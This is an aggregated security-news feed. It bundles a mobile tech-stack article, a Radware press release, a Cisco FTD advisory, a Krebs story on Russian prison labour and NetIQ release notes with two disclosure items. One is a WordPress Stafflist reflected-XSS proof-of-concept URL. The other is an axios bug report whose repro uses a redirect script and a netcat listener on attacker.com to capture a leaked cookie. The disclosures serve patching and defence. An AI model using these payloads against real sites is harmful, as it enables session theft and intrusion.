By Owais Sultan
What a good tech stack for a mobile app is and how to, actually, pick the right one…
This is a post from HackRead.com Read the original post: How to Choose Tech Stack for Mobile App Development

What a good tech stack for a mobile app is and how to, actually, pick the right one to avoid wasting time and resources.

**Introduction**

An excellent mobile app has to be a one-size-fits-all for your specific audience nowadays. It has to meet the needs and requirements of the users it is created for. Needless to say, all users expect only safety, smooth and flawless operation, and a user-friendly interface from your app. Taking into account the reviews of customers on the app stores, not every developer or business can ensure such an experience for their users.

According to Jat App, every company should choose the best stack for developing its mobile app. The success of the app directly depends on it. It will save tons of your time for the development, create new opportunities, and facilitate your further project. The question about how to pick the right technology stack for your future app remains urgent and concerns a lot of business owners. 

Below, you are going to learn more about it, how to choose the stack for your native app, or cross-platform app development. The modern world is mobile-oriented and you cannot deny it. If you are going to succeed with your mobile app and bring only positive experiences to your users, then read carefully and see which mobile app stack will be the most effective and valuable for you. 

**What a Tech Stack, Actually, Is**

First, let us figure out what a tech stack is. To make it simple, a tech stack is a range of tools, programming languages, libraries, and frameworks. It has two core sides — server and client. The rest of the constituents are user experience, stability, development platform, reliability, etc. 

The choice of a mobile app tech stack affects the success and efficiency of your future app. Yes, it is that important! If you do not weigh all the pros and cons and make the wrong decision, you risk wasting your time and money. Last but not least, it can cause the failure of your future app. 

Thus, choosing the right and appropriate tech stack is crucial. To do that, you have to think of the goal of your app first. 

**How to Choose a Tech Stack for Your Needs?**

A tech stack consists of:

*   Back-end

Which, in turn, includes:

*   Server
*   Database
*   Front-end 
*   Webserver
*   Web framework
*   Operating system
*   Programming language

Which includes the following components:

*   CSS 
*   HTML
*   Java Script
*   User’s Browser 

Although everything looks complicated, it is not really so. The market is full of different technology stacks. Picking one of them will not be too complicated. However, before you start working, you must have a plan that will affect the success of your app and business. Your app must have a range of appropriate features, and be functional, scalable, secure, and maintainable. 

It’s crucial to consider several aspects while creating your plan before making a decision. Let’s see how you can and should do that properly! 

**General App Needs**

All apps are different and have different needs and requirements. You cannot deny that applying the same rules and approaches to all of them is impossible. The device for which the app is created, user experience, network type, the platform to run on, time to market, etc. differ for different apps. 

All these aspects must be key factors when choosing a tech stack for a mobile app because the library, language, software, and framework you will choose will depend on them. 

**The Range of Skills of The Development Team**

Different languages and frameworks bring the same results. However, you must reach brilliant results, and thus, pick clear factors. When choosing the stack, it is crucial to take into account the developer’s skills. 

Not every tech stack is user-friendly, unfortunately. If you pick such one, it will only raise the development time. It’s not difficult to guess that the cost of the development will also grow. Vice versa, if you choose a good user-friendly stack with which your team is comfortable, you save their time and therefore, your budget. 

**The Overall Goals of The App**

While making your stack mobile choice, it is necessary to take into account the app goals. Mainely, its primary target. If the app depends on heavy load processing, then it is necessary to pick a reliable tech stack. Precisely streamlined interactions will not be suitable in this case.

**Multiple-platform Running**

If you compare an app running on one platform and the one running on all platforms, you will notice that their tech stacks will be different. But apart from that, you have to take into account the necessary set of tools to scale the app and port it to other platforms, such as Hybrid Platform App Development or Cross. They will be totally different from the set of tools required to develop a native app. 

**Parent Company**

Taking into account the parent company of the web application tech stack is also crucial when developing your app. Some platforms (Google, Adobe, or Microsoft) offer much better community support and documentation than the rest of them. Advanced development options will be a good bonus. 

**Data Security**

The safety of your data matters. Even a small leak of users’ data may seriously harm your reputation. It will all lead to the loss of trust from users. For that reason, you should always choose only the tech stack that guarantees the highest security of all information and data.

**Budget**

The type of your project is affected by many features, such as functionalities, the cost of the development, the time required to complete the project, etc. Your task is to consider all of the needs without extra features. It will boost the development process and save you money from unnecessary expenses. 

Taking into account the enlisted aspects, you will know what kind of stack you need to pick for your project. It has to make your app really innovative and scale it. 

**Compatibility With Other Technologies**

Current technologies are also important when it comes to a choice of a tech stack. They both have to comply with one another. It is not all yet. The tools you plan to input into your app later must also be compatible with the chosen stack. 

**The Difference Between Native and Cross-Platform Apps**

Native app development prevents you from difficulties with creating a sustainable product that covers several platforms and is focused on creating an appropriate design for such target platforms as iOS, Android, or others. 

Cross-platform development is aimed at creating an app that can cover as many followers of the brand as possible thanks to covering a wide amount of end devices in the process of development and programming. Cross-platform apps are perfect for new requirements of omnichannel retailing where consumers expect the main interaction between devices and channels. 

Here are the core differences between native and cross-platform apps:

*   Cost — Native app development is more expensive than cross-platform app development
*   Code usability — Native apps work for one platform while cross-platform apps can work for multiple platforms
*   Performance — Native apps have high and responsive performance while cross-platform apps have high performance, but lags and hardware compatibility issues are not uncommon
*   Device access — Native apps’ platform SDK provides access to the device’s API without any hindrance; With cross-platform apps, there is no access to all device’s API 

**Conclusion**

Choosing the application technology stack is an important stage of the development process. It has to be done before you start working on your app, otherwise, all your finances and precious time can be simply wasted. Take into account the above-mentioned factors before choosing your technology stack. It will decide whether the development process and the app itself are going to be successful.

How to Choose Tech Stack for Mobile App Development

WordPress Stafflist plugin version 3.1.2 suffers from a cross site scripting vulnerability.

**WordPress Stafflist 3.1.2 Cross Site Scripting**

Posted May 3, 2022

Authored by Hassan Khan Yusufzai

WordPress Stafflist plugin version 3.1.2 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 74269ba0f910606e9499b4b87b6ba8ea243f907c7743fde42c4af10707d6f9da

Download | Favorite | View

**WordPress Stafflist 3.1.2 Cross Site Scripting**

    # Exploit Title: WordPress Plugin stafflist 3.1.2 - Reflected XSS (Authenticated)# Date: 05-02-2022# Exploit Author: Hassan Khan Yusufzai - Splint3r7# Vendor Homepage: https://wordpress.org/plugins/stafflist/# Version: 3.1.2# Tested on: Firefox# Contact me: h [at] spidersilk.com# Summary:A cross site scripting reflected vulnerability has been identified inWordPress Plugin stafflist version less then 3.1.2. that allowsunauthenticated users to run arbitrary javascript code insideWordPress using Stafflist Plugin.# POChttp://localhost:10003/wp-admin/admin.php?page=stafflist&remove=1&p=1%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E# Vulnerable Parametersp and s parameters are vulnerable.# Vulnerable Code:$html = ($cur > 1 ? "<p class='pager'><ahref='{$stafflisturl}&p=".($cur-1)."&s={$_GET['s']}'>Previous</a></p>" : ""); //<

**File Tags**

*   ActiveX (932)
*   Advisory (77,240)
*   Arbitrary (15,057)
*   BBS (2,859)
*   Bypass (1,550)
*   CGI (1,010)
*   Code Execution (6,627)
*   Conference (668)
*   Cracker (797)
*   CSRF (3,268)
*   DoS (21,736)
*   Encryption (2,330)
*   Exploit (49,655)
*   File Inclusion (4,142)
*   File Upload (938)
*   Firewall (821)
*   Info Disclosure (2,542)
*   Intrusion Detection (850)
*   Java (2,780)
*   JavaScript (792)
*   Kernel (5,997)
*   Local (13,976)
*   Magazine (586)
*   Overflow (12,125)
*   Perl (1,410)
*   PHP (5,038)
*   Proof of Concept (2,276)
*   Protocol (3,290)
*   Python (1,389)
*   Remote (29,590)
*   Root (3,441)
*   Ruby (574)
*   Scanner (1,629)
*   Security Tool (7,672)
*   Shell (3,054)
*   Shellcode (1,201)
*   Sniffer (879)
*   Spoof (2,077)
*   SQL Injection (15,975)
*   TCP (2,350)
*   Trojan (672)
*   UDP (866)
*   Virus (658)
*   Vulnerability (30,362)
*   Web (8,972)
*   Whitepaper (3,710)
*   x86 (942)
*   XSS (17,290)
*   Other

**File Archives**

*   May 2022
*   April 2022
*   March 2022
*   February 2022
*   January 2022
*   December 2021
*   November 2021
*   October 2021
*   September 2021
*   August 2021
*   July 2021
*   June 2021
*   Older

**Systems**

*   AIX (425)
*   Apple (1,875)
*   BSD (368)
*   CentOS (55)
*   Cisco (1,911)
*   Debian (5,948)
*   Fedora (1,690)
*   FreeBSD (1,241)
*   Gentoo (4,152)
*   HPUX (877)
*   iOS (317)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (41,937)
*   Mac OS X (683)
*   Mandriva (3,105)
*   NetBSD (255)
*   OpenBSD (478)
*   RedHat (11,372)
*   Slackware (941)
*   Solaris (1,606)
*   SUSE (1,444)
*   Ubuntu (7,747)
*   UNIX (9,051)
*   UnixWare (184)
*   Windows (6,373)
*   Other

WordPress Stafflist 3.1.2 Cross Site Scripting

Tiger Global Management invests $35 million in SkyHawk Security to accelerate growth.

**TEL AVIV, Israel, May 3, 2022—** Radware® (NASDAQ: RDWR), a leading provider of cyber security and application delivery solutions, today announced the spinoff of its Cloud Native Protector (CNP) business to form a new company called SkyHawk Security. To accelerate

SkyHawk Security’s development and growth opportunities, an affiliate of Tiger Global

Management will make a $35 million strategic external investment, resulting in a valuation of $180 million. Tiger Global Management is a leading global technology investment firm focused on private and public companies in the internet, software, and financial technology sectors.

Skyhawk Security is a leader in cloud threat detection and protects dozens of the world’s leading organizations using its artificial intelligence and machine learning technologies. Its Cloud Native Protector provides comprehensive protection for workloads and applications hosted in public cloud environments. It uses a multi-layered approach that covers the overall security posture of the cloud and threats to individual workloads. Easy-to-deploy, the agentless solution identifies and prevents compliance violations, cloud security misconfigurations, excessive permissions, and malicious activity in the cloud.

“We recognize the growing opportunities in the public cloud security market and are planning to capitalize on them,” said Roy Zisapel, Radware’s president and CEO. “We look forward to partnering with Tiger Global Management to scale the business, unlock even more security value for customers, and position SkyHawk Security for long-term success.”

The spinoff, which adds to Radware’s recently announced strategic cloud services initiative, further demonstrates the company’s ongoing commitment to innovation. SkyHawk Security will have the ability to operate with even greater sales, marketing, and product focus as well as speed and flexibility. Current and new CNP customers will benefit from future product development efforts, while CNP services for existing customers will continue without interruption.

Radware does not expect the deal to materially affect operating results for the second quarter or full year of 2022.

**About Tiger Global Management**

Tiger Global Management is a leading global technology investment firm that focuses on private and public companies in the software, internet, and financial technology sectors. Since 2001, Tiger Global has invested in hundreds of companies across more than 30 countries, including investments ranging from Series A to pre-IPO. The firm aims to partner with dynamic entrepreneurs operating market-leading companies in its core focus areas.

**About Radware**

Radware® (NASDAQ: RDWR) is a global leader of cyber security and application delivery solutions for physical, cloud, and software defined data centers. Its award-winning solutions portfolio secures the digital experience by providing infrastructure, application, and corporate IT protection, and availability services to enterprises globally. Radware’s solutions empower enterprise and carrier customers worldwide to adapt to market challenges quickly, maintain business continuity, and achieve maximum productivity while keeping costs down. For more information, please visit the Radware website.

Radware encourages you to join our community and follow us on: Facebook, LinkedIn, Radware Blog, Twitter, YouTube, and Radware Mobile for iOS and Android.

©2022 Radware Ltd. All rights reserved. Any Radware products and solutions mentioned in this press release are protected by trademarks, patents, and pending patent applications of Radware in the U.S. and other countries. For more details, please

see: https://www.radware.com/LegalNotice/. All other trademarks and names are property of their respective owners.

Radware believes the information in this document is accurate in all material respects as of its publication date. However, the information is provided without any express, statutory, or implied warranties and is subject to change without notice.

The contents of any website or hyperlinks mentioned in this press release are for informational purposes and the contents thereof are not part of this press release.

Radware Launches SkyHawk Security, a Spinoff of Its  Cloud Native Protector Business

Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository axios/axios prior to 0.26.

**BUG**

Cookie header leaked to third party site and it allow to hijack victim account

**SUMMURY**

When fetching a remote url with Cookie if it get Location response header then it will follow that url and try to fetch that url with provided cookie . So cookie is leaked here to thirdparty.  
Ex: you try to fetch example.com with cookie and if it get redirect url to attacker.com then it fetch that redirect url with provided cookie .  
So, Cookie of example.com is leaked to attacker.com .  
Cookie is standard way to authentication into webapp and you should not leak to other site .  
All browser follow same-origin-policy so that when redirect happen browser does not send cookie of example.com to attacker.com .

**FLOW**

if you fetch http://mysite.com/redirect.php?url=http://attacker.com:8182/ then it will redirect to http://attacker.com:8182/ .

First setup a webserver and a netcat listner

**http://mysite.com/redirect.php?url=http://attacker.com:8182/**

    //redirect.php
    <?php
    $url=$_GET["url"];
    header("Location: $url");
    
    /* Make sure that code below does not get executed when we redirect. */
    exit;
    ?>
    

**netcat listner in http://attacker.com**

nc -lnvp 8182

**STEP TO RERPODUCE**

run bellow axios code

    const axios = require('axios');
    
    // Make a request for a user with a given ID
    axios.get('http://mysite.com/redirect.php?url=http://attacker.com:8182/yy',{headers:{"Cookie":"dfdd=df"}})
      .then(function (response) {
        // handle success
        console.log(response);
      })
      .catch(function (error) {
        // handle error
        console.log(error);
      })
      .then(function () {
        // always executed
      });
    
    

response received in attacker netcat

    Connection from 127.0.0.1 36724 received!
    GET /yy HTTP/1.1
    Accept: application/json, text/plain, */*
    Cookie: dfdd=df
    User-Agent: axios/0.24.0
    Host: localhost:8182
    Connection: close
    
    

So, here i provided cookie for mysite.com but due to redirect it leaks to thirdparty site attacker.com

**SUGGESTED FIX**

If provided url domain and redirect url domain is same then you can only send cookie/authorization header to redirected url . But if the both domain not same then its a third party site which will be redirected, so you dont need to send Cookie/Authorization header.

CVE-2022-1214: Exposure of Sensitive Information to an Unauthorized Actor in axios

A vulnerability in the Snort rule evaluation function of Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to improper handling of the DNS reputation enforcement rule. An attacker could exploit this vulnerability by sending crafted UDP packets through an affected device to force a buildup of UDP connections. A successful exploit could allow the attacker to cause traffic that is going through the affected device to be dropped, resulting in a DoS condition. Note: This vulnerability only affects Cisco FTD devices that are running Snort 3.

**Cisco Firepower Threat Defense Software DNS Enforcement Denial of Service Vulnerability**

High

CVE-2022-20767

CWE-399

Download CVRF

Email

**

Summary

**

*   A vulnerability in the Snort rule evaluation function of Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device.
    
    The vulnerability is due to improper handling of the DNS reputation enforcement rule. An attacker could exploit this vulnerability by sending crafted UDP packets through an affected device to force a buildup of UDP connections. A successful exploit could allow the attacker to cause traffic that is going through the affected device to be dropped, resulting in a DoS condition.
    
    **Note:** This vulnerability only affects Cisco FTD devices that are running Snort 3.
    
    Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.
    
    This advisory is available at the following link:  
    https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-FTD-snort3-DOS-Aq38LVdM
    
    This advisory is part of the April 2022 release of the Cisco ASA, FTD, and FMC Security Advisory Bundled publication. For a complete list of the advisories and links to them, see Cisco Event Response: April 2022 Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication.
    

**

Affected Products

**

*   This vulnerability affects Cisco platforms if they are running a vulnerable release of Cisco FTD Software and both of the following conditions are met:
    
    *   The device is running Snort 3.
    *   DNS reputation enforcement is enabled on the device.
    
    For information about which Cisco software releases are vulnerable, see the Fixed Software section of this advisory.
    
    Snort 3 is running by default for new installations of Cisco FTD releases 7.0.0 and later. On devices that were running Cisco FTD Release 6.7.0 or earlier and were upgraded to Release 7.0.0 or later, Snort 2 is running by default.
    
    DNS reputation enforcement is enabled by default on Cisco FTD releases 6.7 and later. DNS reputation enforcement was introduced in Cisco FTD Release 6.7.
    
    **Determine Cisco FTD Configuration through the FTD CLI**
    
    To determine if Snort 3 is configured on a device, log in to the FTD CLI and use the **show snort3 status** command. If the command produces the following output, the device is running Snort 3 and may be affected by this vulnerability:
    
    > \> **show snort3 status**  
    > Currently running Snort 3
    
    To determine if DNS Reputation Enforcement is enabled, do the following:
    
    1.  Log in to the FTD CLI.
    2.  Use the **expert** command to enter expert mode.
    3.  Go to the lua directory. This directory is located at /ngfw/var/sf/detection\_engines/_uuid_/lua, where _uuid_ is the universally unique identifier for the Cisco FTD installation.
    4.  Use the **grep** command to search for _dns\_filter_ in the _firewall.lua_ file in the lua directory.
        *   If **dns\_filtering\_enabled = true** is in the file, the device is affected by this vulnerability.
        *   If **dns\_filtering\_enabled = false** is in the file, the device is not affected by this vulnerability.
        *   If **dns\_filtering\_enabled** is not in the file, the device is not affected by this vulnerability.
    
    > \>expert  
    > expert admin@ftd700:~$ cd /ngfw/var/sf/detection\_engines/e4dec56e-ef9e-11eb-b690-6843d4a521ed/lua/  
    > expert admin@ftd700:~$ grep dns\_filter firewall.lua  
    >  dns\_filtering\_enabled = true
    
    **Note:** The show **access-control-config** command does not show the correct status of the DNS reputation enforcement setting due to defect CSCwb37077.
    
    **Determine Cisco FTD Configuration for Cisco Firepower Management Center (FMC) Managed Devices**
    
    To determine if Snort 3 is configured on a device, do the following:
    
    1.  Log in to the FMC web interface.
    2.  From the **Devices** menu, choose **Device Management**.
    3.  Choose the appropriate FTD device.
    4.  Click the **Edit** pencil icon.
    5.  Click the **Device** tab and look in the **Inspection Engine** area.
        *   If **Snort 2** is listed, the device is not affected by this vulnerability.
        *   If **Snort 3** is listed, the device may be affected by this vulnerability.
    
    To determine if DNS reputation enforcement is enabled, do the following:
    
    1.  Log in to the FMC web interface.
    2.  From the **Policies** menu, choose **Access Control**.
    3.  Choose the policy to review.
    4.  Click the **Edit** pencil icon.
    5.  Click the **Advanced** tab.
    6.  In the **General Settings** area, look for **Enable reputation enforcement on DNS traffic.**
    
    *   If the setting is **Yes**, the device is affected by this vulnerability.
    *   If the setting is **No**, the device is not affected by this vulnerability.
    
    **Determine Cisco FTD Configuration for Cisco Firepower Device Management (FDM) Managed Devices**
    
    To determine if Snort 3 is configured on a device, do the following:
    
    1.  Log in to the FTD web interface.
    2.  From the main menu, choose **Policies**.
    3.  Click the **Intrusion** tab.
    4.  Look for the **Inspection Engine** version. The version will start with either a _2_ for Snort 2 or a _3_ for Snort 3.
        *   If the version begins with a _2_, the device is running a Snort 2 version and is not affected by this vulnerability.
        *   If the version begins with a _3_, the device is running a Snort 3 version and could be affected by this vulnerability.
    
    To determine if DNS reputation enforcement is enabled, do the following:
    
    1.  Log in to the FTD web interface.
    2.  From the main menu, choose **Policies**.
    3.  Click the **Access Control** tab.
    4.  Click the **Settings** gear.
    5.  Look for **Reputation Enforcement on DNS traffic**.
    
    *   If the setting is on, the device is affected by this vulnerability.
    *   If the setting is off, the device is not affected by this vulnerability.
    
    **Determine Cisco FTD Configuration for Cisco Defense Orchestrator Managed Devices**
    
    To determine if Snort 3 is configured, do the following:
    
    1.  Log in to the Cisco Defense Orchestrator web interface.
    2.  From the **Inventory** menu, choose the appropriate FTD device.
    3.  In the **Device Details** area, look for **Snort Version**. The version will start with either a _2_ for Snort 2 or a _3_ for Snort 3.
        *   If the version begins with a _2_, the device is running a Snort 2 version and is not affected by this vulnerability.
        *   If the version begins with a _3_, the device is running a Snort 3 version and could be affected by this vulnerability.
    
    To determine if DNS reputation enforcement is enabled, do the following:
    
    1.  Log in to the Cisco Defense Orchestrator web interface.
    2.  From the **Inventory** menu, choose the appropriate FTD device.
    3.  In the **Management** area, click **Policy**.
    4.  Click the **Settings** gear.
    5.  Look for **Reputation Enforcement on DNS traffic.**
        *   If the setting is on, the device is affected by this vulnerability.
        *   If the setting is off, the device is not affected by this vulnerability.
    
    Only products listed in the Vulnerable Products section of this advisory are known to be affected by this vulnerability.
    
    Cisco has confirmed that this vulnerability does not affect the following Cisco products:
    
    *   Adaptive Security Appliance (ASA) Software
    *   FMC Software
    *   FTD Software that is running Snort 2
    *   Meraki MX Series Software
    *   Open source Snort 2 Project
    *   Open source Snort 3 Project
    

**

Workarounds

**

*   There are no workarounds that address this vulnerability. However, as a mitigation, administrators can disable DNS reputation enforcement. Disabling DNS reputation enforcement from the FTD CLI is not recommended because that process does not update the setting in the management device. This could cause instability in the system or unplanned reversion of the setting.
    
    To disable DNS reputation enforcement for Cisco FMC managed devices, do the following:
    
    1.  Log in to the FMC web interface.
    2.  From the **Policies** menu, choose **Access Control**.
    3.  Choose the policy to review.
    4.  Click the **Edit** pencil icon.
    5.  Click the **Advanced** tab.
    6.  Click the **Edit** pencil icon for **General Settings**.
    7.  Uncheck the **Enable reputation enforcement on DNS traffic** check box to turn the setting off.
    8.  Click **OK**.
    9.  Deploy the change to the FTD devices.
    
    To disable DNS reputation enforcement for Cisco FDM managed devices, do the following:
    
    1.  Log in to the FTD web interface.
    2.  From the main menu, click **Policies**.
    3.  Click the **Access Control** tab.
    4.  Click the **Settings** gear.
    5.  Look for the **Reputation Enforcement on DNS traffic**.
    6.  Click the switch to turn the setting off.
    7.  Click **OK**.
    
    To disable DNS Reputation Enforcement for Cisco Defense Orchestrator managed devices, do the following:
    
    1.  Log in to the Cisco Defense Orchestrator web interface.
    2.  From the **Inventory** menu, choose the appropriate FTD device.
    3.  In the **Management** area, click **Policy**.
    4.  Click the **Settings** gear.
    5.  Look for the **Reputation Enforcement on DNS traffic**.
    6.  Click the switch to turn the setting off.
    7.  Click **OK**.
    8.  Deploy the change to the FTD device.
    
    While these mitigations have been deployed and were proven successful in a test environment, customers should determine the applicability and effectiveness in their own environment and under their own use conditions. Customers should be aware that any workaround or mitigation that is implemented may negatively impact the functionality or performance of their network based on intrinsic customer deployment scenarios and limitations. Customers should not deploy any workarounds or mitigations before first evaluating the applicability to their own environment and any impact to such environment.
    

**

Fixed Software

**

*   Cisco has released free software updates that address the vulnerability described in this advisory. Customers with service contracts that entitle them to regular software updates should obtain security fixes through their usual update channels.
    
    Customers may only install and expect support for software versions and feature sets for which they have purchased a license. By installing, downloading, accessing, or otherwise using such software upgrades, customers agree to follow the terms of the Cisco software license:  
    https://www.cisco.com/c/en/us/products/end-user-license-agreement.html
    
    Additionally, customers may only download software for which they have a valid license, procured from Cisco directly, or through a Cisco authorized reseller or partner. In most cases this will be a maintenance upgrade to software that was previously purchased. Free security software updates do not entitle customers to a new software license, additional software feature sets, or major revision upgrades.
    
    The Cisco Support and Downloads page on Cisco.com provides information about licensing and downloads. This page can also display customer device support coverage for customers who use the My Devices tool.
    
    When considering software upgrades, customers are advised to regularly consult the advisories for Cisco products, which are available from the Cisco Security Advisories page, to determine exposure and a complete upgrade solution.
    
    In all cases, customers should ensure that the devices to be upgraded contain sufficient memory and confirm that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, customers are advised to contact the Cisco Technical Assistance Center (TAC) or their contracted maintenance providers.
    
    **Customers Without Service Contracts**
    
    Customers who purchase directly from Cisco but do not hold a Cisco service contract and customers who make purchases through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should obtain upgrades by contacting the Cisco TAC: https://www.cisco.com/c/en/us/support/web/tsd-cisco-worldwide-contacts.html
    
    Customers should have the product serial number available and be prepared to provide the URL of this advisory as evidence of entitlement to a free upgrade.
    
    **Fixed Releases**
    
    In the following table(s), the left column lists Cisco software releases. The center column indicates whether a release is affected by the vulnerability described in this advisory and the first release that includes the fix for this vulnerability. The right column indicates whether a release is affected by any of the Critical or High SIR vulnerabilities described in this bundle and which release includes fixes for those vulnerabilities.
    
    **FTD Software**
    
    Cisco FTD Software Release
    
    First Fixed Release for This Vulnerability
    
    First Fixed Release for All Vulnerabilities Described in the Bundle of Advisories
    
    6.2.2 and earlier1
    
    Not vulnerable.2
    
    Migrate to a fixed release.
    
    6.2.3
    
    Not vulnerable.2
    
    Migrate to a fixed release.
    
    6.3.01
    
    Not vulnerable.2
    
    Migrate to a fixed release.
    
    6.4.0
    
    Not vulnerable.2
    
    6.4.0.15 (May 2022)
    
    6.5.01
    
    Not vulnerable.2
    
    Migrate to a fixed release.
    
    6.6.0
    
    Not vulnerable.2
    
    6.6.5.2
    
    6.7.0
    
    Migrate to a fixed release.3
    
    Migrate to a fixed release.
    
    7.0.0
    
    7.0.2 (May 2022)
    
    7.0.2 (May 2022)
    
    7.1.0
    
    7.1.0.1
    
    7.1.0.1
    
    1\. Cisco FMC and FTD Software releases 6.2.2 and earlier, as well as releases 6.3.0 and 6.5.0, have reached end of software maintenance. Customers are advised to migrate to a supported release that includes the fix for this vulnerability.
    
    2\. Snort 3 was first included in Cisco FTD Release 6.7.0 for Cisco FDM and Cisco Defense Orchestrator managed devices. Snort 3 was first released in Cisco FTD Release 7.0.0 for Cisco FMC managed devices.
    
    3\. Only Cisco FDM and Cisco Defense Orchestrator managed devices are vulnerable in Release 6.7.0. Cisco FMC managed devices are not vulnerable because Snort 3 was not released in Cisco FMC managed devices until Release 7.0.0.
    
    For instructions on upgrading your FTD device, see Cisco Firepower Management Center Upgrade Guide.
    
    The Cisco Product Security Incident Response Team (PSIRT) validates only the affected and fixed release information that is documented in this advisory.
    

**

Exploitation and Public Announcements

**

*   The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory.
    

**

Source

**

*   This vulnerability was found during the resolution of a Cisco TAC support case.
    

**

Cisco Security Vulnerability Policy

**

*   To learn about Cisco security vulnerability disclosure policies and publications, see the Security Vulnerability Policy. This document also contains instructions for obtaining fixed software and receiving security vulnerability information from Cisco.
    

*   Subscribe
    

**

Related to This Advisory

**

*   Cisco Event Response: April 2022 Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication
    

**

URL

**

*   https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-FTD-snort3-DOS-Aq38LVdM
    

**

Revision History

**

*   Version
    
    Description
    
    Section
    
    Status
    
    Date
    
    1.0
    
    Initial public release.
    
    \-
    
    Final
    
    2022-APR-27
    
    Show Less
    

**

Legal Disclaimer

**

*   THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME.
    
    A standalone copy or paraphrase of the text of this document that omits the distribution URL is an uncontrolled copy and may lack important information or contain factual errors. The information in this document is intended for end users of Cisco products.
    

**

Feedback

**

*   Leave additional feedback

CVE-2022-20767: Cisco Security Advisory: Cisco Firepower Threat Defense Software DNS Enforcement Denial of Service Vulnerability

Faced with a brain drain of smart people fleeing the country following its invasion of Ukraine, the Russian Federation is floating a new strategy to address a worsening shortage of qualified information technology experts: Forcing tech-savvy people within the nation's prison population to perform low-cost IT work for domestic companies.

Image: Proxima Studios, via Shutterstock.

Faced with a brain drain of smart people fleeing the country following its invasion of Ukraine, the Russian Federation is floating a new strategy to address a worsening shortage of qualified information technology experts: Forcing tech-savvy people within the nation’s prison population to perform low-cost IT work for domestic companies.

Multiple Russian news outlets published stories on April 27 saying the Russian **Federal Penitentiary Service** had announced a plan to recruit IT specialists from Russian prisons to work remotely for domestic commercial companies.

Russians sentenced to forced labor will serve out their time at one of many correctional centers across dozens of Russian regions, usually at the center that is closest to their hometown. **Alexander Khabarov**, deputy head of Russia’s penitentiary service, said his agency had received proposals from businessmen in different regions to involve IT specialists serving sentences in correctional centers to work remotely for commercial companies.

Khabarov told Russian media outlets that under the proposal people with IT skills at these facilities would labor only in IT-related roles, but would not be limited to working with companies in their own region.

“We are approached with this initiative in a number of territories, in a number of subjects by entrepreneurs who work in this area,” Khabarov told Russian state media organization TASS. “We are only at the initial stage. If this is in demand, and this is most likely in demand, we think that we will not force specialists in this field to work in some other industries.”

According to Russian media site Lenta.ru, since March 21 nearly 95,000 vacancies in IT have remained unfilled in Russia. Lenta says the number unfilled job slots actually shrank 25 percent from the previous month, officially because “many Russian companies are currently reviewing their plans and budgets, and some projects have been postponed.” The story fails to even mention the recent economic sanctions that are currently affecting many Russian companies thanks to Russia’s invasion of Ukraine in late February.

The **Russian Association for Electronic Communications** (RAEC) estimated recently that between 70,000 and 100,000 people will leave Russia as part of the second wave of emigration of IT specialists from Russia. “The study also notes that the number of IT people who want to leave Russia is growing. Experts consider the USA, Germany, Georgia, Cyprus and Canada to be the most attractive countries for moving,” Lenta reported of the RAEC survey.

It’s not clear how many “IT specialists” are currently serving prison time in Russia, or precisely what that might mean in terms of an inmate’s IT skills and knowledge. According to the BCC, about half of the world’s prison population is held in the United States, Russia or China. The BCC says Russia currently houses nearly 875,000 inmates, or about 615 inmates for every 100,000 citizens. The United States has an even higher incarceration rate (737/100,000), but also a far larger total prison population of nearly 2.2 million.

**Sergei Boyarsky**, deputy chairman of the Russian Duma’s Committee on Information Policy, said the idea was worth pursuing if indeed there are a significant number of IT specialists who are already incarcerated in Russia.

“I know that we have a need in general for IT specialists, this is a growing market,” said Boyarsky, who was among the Russian leaders sanctioned by the United States Treasury on Marc. 24, 2022 in response to the Russian invasion of Ukraine. Boyarsky is head of the St. Petersburg branch of United Russia, a strongly pro-Putin political party that holds more than 70 percent of the seats in the Russian State Duma.

“Since they still work there, it would probably be right to give people with a profession that allows them to work remotely not to lose their qualifications,” Boyarsky was quoted as saying of potentially qualified inmates. “At a minimum, this proposal is worth attention and discussion if there are a lot of such specialists.”

According to Russia’s penitentiary service, the average salary of those sentenced to forced labor is about 20,000 rubles per month, or approximately USD $281. Russian news outlet RBC reports that businesses started using prison labor after the possibility of creating correctional centers in organizations appeared in 2020. RBC notes that Russia now has 117 such centers across 76 Russian regions.

Russia to Rent Tech-Savvy Prisoners to Corporate IT?

Potential open redirection vulnerability when URL is crafted in specific format in NetIQ Access Manager prior to 5.0.2

This release includes the following new features and enhancements:

*   Identity Server Authentication APIs
    
*   Integration of Microsoft Windows Autopilot with Access Manager
    
*   Support for Specifying Scopes for a Client Application
    
*   Integration with Itsme
    
*   Analytics Dashboard Plug-in Support
    
*   Enhanced WS-Federation Service Provider
    
*   Enhancements to Upgrade Assistant
    
*   Support for Integration with Advanced Authentication as a Service
    
*   Enhanced UserInfo Endpoint to Decrypt Tokens Encrypted Using Custom Keys
    
*   Updates for Dependent Components
    
*   Videos
    

**1.1 Identity Server Authentication APIs**

This release introduces Identity Server authentication APIs. These APIs enable you to build your own end-to-end login experience replacing the built-in user portal login experience. You can use these APIs in the following scenarios:

Primary Authentication: Verifies the end-users' credentials using one of the following methods:

*   Name/Password - Basic
    
*   Name/Password - Form
    
*   Secure Name/Password - Basic
    
*   Secure Name/Password - Form
    

Multi-factor Authentication: When Access Manager is integrated with Advanced Authentication through the plug-in approach, the API supports multi-factor authentication for the following methods:

*   Smartphone
    
*   Voice call
